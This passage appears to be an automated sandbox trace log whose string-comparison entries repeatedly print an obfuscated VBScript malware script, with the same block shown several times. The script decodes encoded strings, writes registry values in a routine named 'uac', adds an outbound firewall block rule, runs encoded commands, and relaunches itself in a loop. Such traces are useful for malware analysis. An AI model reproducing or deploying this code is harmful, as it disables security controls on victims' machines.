0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.304] wcsncmp (_String1="r = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.304] wcsncmp (_String1=" = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.304] wcsncmp (_String1="= sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.305] wcsncmp (_String1=" sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, 